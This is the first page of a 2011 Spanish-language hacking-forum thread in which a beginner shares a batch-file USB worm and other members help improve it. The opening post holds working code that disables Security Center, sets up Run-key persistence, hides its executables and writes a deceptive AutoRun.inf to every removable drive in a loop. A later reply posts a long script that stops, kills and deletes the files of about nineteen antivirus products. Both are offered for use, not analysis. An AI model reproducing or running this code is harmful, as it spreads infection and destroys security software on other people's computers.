elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Mi nuevo propagador, por usb!!		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Mi nuevo propagador, por usb!!  (Leído 21,039 veces)
morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Mi nuevo propagador, por usb!!
« en: 5 Enero 2011, 18:30 pm »
hola amigos....
a ver que os parece!!



@echo off
#djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô
net stop "Centro de seguridad"
reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f
reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe"
ping -n 8 localhost > nul
attrib -s -r -h video.wmv.exe
copy /y "video.wmv.exe" "%windir%\video.wmv.exe
if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe
attrib -s -r -h junto.exe
copy /y "junto.exe" "%windir%\junto.exe
attrib -s -r -h prop.exe
copy /y "prop.exe" "%windir%\prop.exe
attrib +s +r +h video.wmv.exe
attrib +s +r +h prop.exe
attrib +s +r +h junto.exe
:bucle
call :copiausb
:copiausb
if exist E: call :creausb E
if exist F: call :creausb F
if exist G: call :creausb G
if exist H: call :creausb H
if exist I: call :creausb I
if exist J: call :creausb J
if exist K: call :creausb K
ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb
copy /y "%windir%\junto.exe" "%1:\junto.exe"
attrib +s +r +h %1:\junto.exe
echo [Autorun] > %windir%\AutoRun.inf
echo open="junto.exe" >> %windir%\AutoRun.inf
echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf
echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf
echo shellexecute="junto.exe" >> %windir%\AutoRun.inf
echo UseAutoPlay=1 >> %windir%\AutoRun.inf
echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf
echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf
echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf
echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf
copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf"
attrib +h +s +r "%1:\AutoRun.inf"
goto :eof




el video.wmv.exe es el server con eliminación en inicio

junto.exe es el server y el propagador(prop.exe) conpactados en un .exe

no lo he provado en vista ni en win  7 pero en xp me funciona.


no seais malos con las criticas que estoy empezando!! :laugh: :laugh: :laugh:
saludos!!!
morty2
En línea
rdzlcs


Desconectado Desconectado

Mensajes: 784


El cerebro, la experiencia y una pizca de suerte.


Ver Perfil
Re: Mi nuevo propagador, por usb!!
« Respuesta #1 en: 5 Enero 2011, 18:35 pm »
Interesante..

Para que funciona, el LAMER.exe?  :silbar:

SAludos
En línea
morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: Mi nuevo propagador, por usb!!
« Respuesta #2 en: 5 Enero 2011, 18:57 pm »
Cita de: CL1O en  5 Enero 2011, 18:35 pm
Interesante..

Para que funciona, el LAMER.exe?  :silbar:

SAludos

no entiendo porque me llamas lamer, he dicho que estoy empezando y esto no es mas que un batch para propagar por usb.
¿esque tu naciste aprendido?....pues si no es asi, no la tires como si nada que los demas tambien sabemos tirarla.................."Renault CL1O"
Salu2
En línea
AFelipeTrujillo

Desconectado Desconectado

Mensajes: 160



Ver Perfil WWW
Re: Mi nuevo propagador, por usb!!
« Respuesta #3 en: 5 Enero 2011, 19:02 pm »
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!!  :rolleyes:
En línea
C0mUnidAd C0dif|cad4.C0M
morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: Mi nuevo propagador, por usb!!
« Respuesta #4 en: 5 Enero 2011, 19:08 pm »
Cita de: 4ng3r en  5 Enero 2011, 19:02 pm
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!!  :rolleyes:

gracias 4ng3r!!
En línea
Arcano.


Desconectado Desconectado

Mensajes: 469



Ver Perfil
Re: Mi nuevo propagador, por usb!!
« Respuesta #5 en: 5 Enero 2011, 19:20 pm »
Buenas morty2,

Sólo una pregunta, ¿para qué paras el centro de seguridad?.

Con eso, evitarás el mensajito de "No tiene antivirus, no está activo el Firewall, no están activas las actualizaciones automáticas", pero... ¿De qué te servirá?.

¿No será mejor que detengas el Firewall de Windows XP? Ya que de lo contrario, no podrás acceder al equipo.

Para empezar... Es un buen principio. Espero que tu curiosidad no te empuje "al lado oscuro"...  :¬¬

Saludos.
En línea
La curiosidad es la antesala al conocimiento...
morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: Mi nuevo propagador, por usb!!
« Respuesta #6 en: 5 Enero 2011, 19:23 pm »
Cita de: Arcano. en  5 Enero 2011, 19:20 pm
Buenas morty2,

Sólo una pregunta, ¿para qué paras el centro de seguridad?.

Con eso, evitarás el mensajito de "No tiene antivirus, no está activo el Firewall, no están activas las actualizaciones automáticas", pero... ¿De qué te servirá?.

¿No será mejor que detengas el Firewall de Windows XP? Ya que de lo contrario, no podrás acceder al equipo.

Para empezar... Es un buen principio. Espero que tu curiosidad no te empuje "al lado oscuro"...  :¬¬

Saludos.


tu lo has dicho!!!para evitar cartelitos, para hacerlo mas oculto a la vista, pensé que seria bueno n?
como detengo el firewall??

salu2
morty2
« Última modificación: 5 Enero 2011, 19:28 pm por morty2 » En línea
Arcano.


Desconectado Desconectado

Mensajes: 469



Ver Perfil
Re: Mi nuevo propagador, por usb!!
« Respuesta #7 en: 5 Enero 2011, 19:31 pm »
Buenas,

Citar
...pensé que seria bueno n

Si piensas continuar el código y tu intención es parar el antivirus, sí. Así no avisará el sistema, pero... Tal cual está, "a tu propagador" le da un poquito igual "El centro de seguridad". Y "El centro de seguridad" tampoco te va a controlar si se copia un fichero.

Supongo que tu idea es: (1) Acceder al sistema. (2) Propagarte por USB.

Para ello: Deberías parar el Firewall para acceder, parar el centro de seguridad, el antivirus, y empezar a escribir... Y... Lo más importante, ¿cómo accederías al sistema?.

Nada, el código, como está... Es un buen principio. Pero no le veo utilidad a parar el Centro de Seguridad.

De todas formas, existe gente por el foro que sabe mucho más de estos temas. A ver si te cuentan algo.

Saludos!
En línea
La curiosidad es la antesala al conocimiento...
morty2

Desconectado Desconectado

Mensajes: 33



Ver Perfil
Re: Mi nuevo propagador, por usb!!
« Respuesta #8 en: 5 Enero 2011, 19:44 pm »
Cita de: Arcano. en  5 Enero 2011, 19:31 pm
Buenas,

Si piensas continuar el código y tu intención es parar el antivirus, sí. Así no avisará el sistema, pero... Tal cual está, "a tu propagador" le da un poquito igual "El centro de seguridad". Y "El centro de seguridad" tampoco te va a controlar si se copia un fichero.

Supongo que tu idea es: (1) Acceder al sistema. (2) Propagarte por USB.

Para ello: Deberías parar el Firewall para acceder, parar el centro de seguridad, el antivirus, y empezar a escribir... Y... Lo más importante, ¿cómo accederías al sistema?.

Nada, el código, como está... Es un buen principio. Pero no le veo utilidad a parar el Centro de Seguridad.

De todas formas, existe gente por el foro que sabe mucho más de estos temas. A ver si te cuentan algo.

Saludos!
Mi idea es seguir con el code para desctivar el Av. Pero tengo que averiguar como hacerlo
En línea
AFelipeTrujillo

Desconectado Desconectado

Mensajes: 160



Ver Perfil WWW
Re: Mi nuevo propagador, por usb!!
« Respuesta #9 en: 5 Enero 2011, 21:32 pm »
yo creo que matando el proceso se puede para el antivirus no?? creo q alguna vez vi una lista de antivirus y dependiendo la validación le hace un taskill al proceso no se que tan cierto sea pero puede funcionar ?? no se mire este codigo:

Código
  1.  
  2. @echo off
  3. If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
  4. :1
  5. If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
  6. :2
  7. If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
  8. :3
  9. If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
  10. :4
  11. If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
  12. :5
  13. If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
  14. :6
  15. If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
  16. :7
  17. If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8)
  18. :8
  19. If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
  20. :9
  21. If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
  22. :10
  23. If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
  24. :11
  25. If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else (goto 12)
  26. :12
  27. If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
  28. :13
  29. If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
  30. :14
  31. If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto 15)
  32. :15
  33. If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
  34. :16
  35. If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
  36. :17
  37. If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else (gto 18)
  38. :18
  39. If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
  40. :19
  41. If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
  42. :20
  43. goto fin
  44. :bit9
  45. net stop "bdoesrv"
  46. net stop "bdmcon"
  47. net stop "bdnagent"
  48. net stop "bdswitch"
  49.  
  50. Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
  51. cd C:\Archivos de programa\Softwin\BitDefender9
  52. attrib -H -S -R *.*
  53. del /s /q *.*
  54. :avpersonal
  55. net stop "AVGUARD"
  56. net stop "AVWUPSRV"
  57. net stop "AVGNT"
  58. net stop "AVSched32"
  59.  
  60. Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
  61. cd C:\Archivos de programa\AVPersonal
  62. attrib -H -S -R *.*
  63. del /s /q *.*
  64. :pandatitanium
  65. net stop "Pavsrv51"
  66. net stop "AVENGINE"
  67. net stop "apvxdwin"
  68. net stop "pavProxy"
  69. Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
  70. cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
  71. attrib -H -S -R *.*
  72. del /s /q *.*
  73. rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
  74. :sinspy
  75. Taskkill /f /IM no-spy.exe
  76. cd "C:\Archivos de programa\SinEspias"
  77. attrib -H -S -R *.*
  78. del /s /q *.*
  79. :sweeper
  80. Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
  81. cd "C:\Archivos de programa\Webroot\Spy Sweeper"
  82. attrib -H -S -R *.*
  83. del /s /q *.*
  84. :kav
  85. cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
  86. net stop "kav"
  87. net stop "kavsvc"
  88. Taskkill /f /IM kav.exe /IM kavsvc.exe
  89. attrib -H -S -R *.*
  90. del /s /q *.*
  91. goto 15
  92. :micanti
  93. cd "C:\Archivos de programa\Microsoft AntiSpyware"
  94. net stop "gcasServ"
  95. net stop "gcasDtServ"
  96. Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
  97. attrib -H -S -R *.*
  98. del /s /q *.*
  99. goto 14
  100. :Avast4
  101. cd "C:\Archivos de programa\Alwil Software\Avast4"
  102. net stop "aswUpdSv"
  103. net stop "ashServ"
  104. net stop "ashWebSv"
  105. net stop "ashDisp"
  106. Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
  107. attrib -H -S -R *.*
  108. del /s /q *.*
  109. goto 13
  110. :Panda06
  111. cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
  112. net stop "TPSrv"
  113. net stop "PavFnSvr"
  114. net stop "pavsrv51"
  115. net stop "pskmssvc"
  116. net stop "AVENGINE"
  117. net stop "PNMSRV"
  118. net stop "PsImSvc"
  119. Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM PNMSRV.EXE /IM PsImSvc.exe
  120. attrib -H -S -R *.*
  121. del /s /q *.*
  122. cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
  123. attrib -H -S -R *.*
  124. del /s /q *.*
  125. cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
  126. attrib -H -S -R *.*
  127. del /s /q *.*
  128. cd "C:\Program Files\Common Files\Panda Software\PavShld"
  129. Taskkill /f /IM pavprsrv.exe
  130. attrib -H -S -R *.*
  131. del /s /q *.*
  132. goto 12
  133. :norton2
  134. cd "C:\Archivos de programa\Norton AntiVirus"
  135. net stop "navapsvc"
  136. net stop "NPFMntor"
  137. Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
  138. attrib -H -S -R *.*
  139. del /s /q *.*
  140. cd "C:\Archivos de programa\Norton AntiVirus\IWP"
  141. attrib -H -S -R *.*
  142. del /s /q *.*
  143. goto 11
  144. :norton
  145. cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
  146. net stop "ccSetMgr"
  147. net stop "SNDSrvc"
  148. net stop "SPBBCSvc"
  149. net stop "ccEvtMgr"
  150. net stop "ccApp"
  151. net stop "symlcsvc"
  152. Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM symlcsvc.exe
  153. attrib -H -S -R *.*
  154. del /s /q *.*
  155. cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
  156. attrib -H -S -R *.*
  157. del /s /q *.*
  158. cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
  159. attrib -H -S -R *.*
  160. del /s /q *.*
  161. goto 10
  162. :avfree
  163. cd "C:\Archivos de programa\Grisoft\AVG free"
  164. net stop "avgamsvr"
  165. net stop "vgupsvc"
  166. net stop "avgcc"
  167. Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
  168. attrib -H -S -R *.*
  169. del /s /q *.*
  171. :sinapti
  172. cd "C:\Archivos de programa\Synaptics\SynTP"
  173. net stop "SynTPLpr"
  174. net stop "SynTPEnh"
  175. Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
  176. attrib -H -S -R *.*
  177. del /s /q *.*
  179. :trend
  180. cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
  181. net stop "ntrtscan"
  182. net stop "tmlisten"
  183. net stop "OfcPfwSvc"
  184. net stop "pccntmon"
  185. Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
  186. attrib -H -S -R *.*
  187. del /s /q *.*
  189. :zone
  190. cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
  191. net stop "zlclient"
  192. net stop "zonealarm"
  193. net stop "vsmon"
  194. Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
  195. attrib -H -S -R *.*
  196. del /s /q *.*
  197. cd "C:\WINDOWS\system32\ZoneLabs"
  198. attrib -H -S -R *.*
  199. del /s /q *.*
  201. :mcafee
  202. cd "c:\archivos de programa\mcafee.com\agent"
  203. net stop "mcdetect"
  204. net stop "mctskshd"
  205. net stop "mcagent"
  206. net stop "mcvsescn"
  207. net stop "mcvsftsn"
  208. net stop "mcvsshld"
  209. net stop "mcvsrte"
  210. net stop "mcshield"
  211. Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
  212. attrib -H -S -R *.*
  213. del /s /q *.*
  214. rd /s /q "c:\archivos de programa\mcafee.com\agent"
  215. rd /s /q "c:\archivos de programa\mcafee.com"
  217. :windefender
  218. cd "C:\Archivos de programa\Windows Defender"
  219. net stop "MsMpEng"
  220. net stop "MSASCui"
  221. Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
  222. attrib -H -S -R *.*
  223. del /s /q *.*
  225. :spybot
  226. cd "C:\Archivos de programa\Spybot - Search & Destroy"
  227. net stop "TeaTimer"
  228. Taskkill /f /IM TeaTimer.exe
  229. attrib -H -S -R *.*
  230. del /s /q *.*
  232. :nod32
  233. cd "C:\Archivos de programa\Eset"
  234. net stop "nod32krn"
  235. net stop "nod32kui"
  236. net stop "nod32"
  237. Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
  238. attrib -H -S -R *.*
  239. del /s /q *.*
  241. :ewido
  242. cd "C:\Archivos de programa\ewido anti-malware"
  243. Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
  244. net stop "ewidoctrl"
  245. net stop "ewidoguard"
  246. attrib -H -S -R *.*
  247. del /s /q *.*
  249. :fin
  251.  
  252.  


reviselo no se si llegue a funcionar me imagino que toca tener permisos de Administrador, pruebelo y nos comenta !!!
« Última modificación: 5 Enero 2011, 21:34 pm por 4ng3r » En línea
C0mUnidAd C0dif|cad4.C0M
Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
nuevo userbar (nuevo logo xD) « 1 2 3 »
Diseño Gráfico 		Nakp 20 11,201 Último mensaje 1 Enero 2007, 18:41 pm
por Nakp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines